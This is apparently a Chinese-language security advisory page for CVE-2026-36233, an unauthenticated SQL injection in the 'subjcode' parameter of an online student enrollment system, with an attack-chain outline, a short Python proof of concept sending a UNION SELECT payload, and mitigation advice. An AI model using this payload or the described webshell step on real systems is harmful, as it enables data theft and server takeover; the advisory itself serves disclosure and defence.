IPBUF安全漏洞报告
English
CVE-2026-36233 CVSS 9.8 严重

CVE-2026-36233: 在线学生选课系统SQL注入漏洞

披露日期: 2026-04-10
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-36233
漏洞类型
SQL注入
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
itsourcecode Online Student Enrollment System

相关标签

SQL注入CVE-2026-36233Web安全itsourcecode远程代码执行信息泄露

漏洞概述

itsourcecode Online Student Enrollment System v1.0版本存在严重的SQL注入漏洞。该漏洞位于assignInstructorSubjects.php文件中,由于未对用户输入的“subjcode”参数进行适当的清洗和验证,攻击者可直接构造恶意SQL语句执行。漏洞无需认证即可通过网络利用,可能导致数据库敏感信息泄露、数据篡改甚至服务器被完全控制,对系统机密性、完整性和可用性造成严重影响。

技术细节

该漏洞属于典型的SQL注入缺陷。在itsourcecode Online Student Enrollment System的assignInstructorSubjects.php文件中,后端代码直接获取用户提交的“subjcode”参数,并将其拼接到SQL查询语句中执行,未使用预编译语句(如PDO)或进行严格的输入过滤。由于CVSS向量显示无需用户交互且无需认证(PR:N),攻击者可通过发送特制的HTTP请求,在“subjcode”参数中注入恶意SQL payload(如UNION SELECT查询、布尔盲注或报错注入)。成功利用后,攻击者可以绕过应用逻辑,读取数据库中的学生信息、管理员凭证,甚至在特定数据库配置下写入WebShell或执行系统命令,从而完全控制服务器。

攻击链分析

STEP 1
1. 信息收集
攻击者识别目标运行的是itsourcecode Online Student Enrollment System v1.0,并定位到assignInstructorSubjects.php接口。
STEP 2
2. 漏洞探测
攻击者向该接口发送包含单引号等特殊字符的测试数据,观察服务器响应是否出现数据库报错或页面异常,确认存在SQL注入。
STEP 3
3. 构造攻击载荷
利用确认的注入点,构造UNION SELECT或其他SQL语句,尝试提取数据库结构、敏感数据(如账户密码)。
STEP 4
4. 数据窃取或权限提升
获取管理员哈希后解密登录后台,或直接利用数据库权限写入WebShell,获取服务器控制权。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Replace with actual target) target_url = "http://target.com/assignInstructorSubjects.php" # Payload to test SQL Injection (Extracting database version) # Assuming the parameter is passed via POST payload_data = { "subjcode": "' UNION SELECT 1, user(), version(), 4-- -" } try: # Send POST request with malicious payload response = requests.post(target_url, data=payload_data) # Check if the response contains database information if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response snippet:") print(response.text[:500]) # Print first 500 chars for analysis else: print("[-] Target might be down or blocking requests.") except Exception as e: print(f"[!] An error occurred: {e}")

影响范围

itsourcecode Online Student Enrollment System v1.0

防御指南

临时缓解措施
建议立即修改受影响的PHP文件,将字符串拼接的SQL查询方式改为使用PDO或MySQLi扩展的预处理语句。在代码修复完成前,应在应用防火墙或服务器侧添加针对"subjcode"参数的过滤规则,拦截包含单引号、UNION、SELECT等关键字的请求,以暂时降低风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表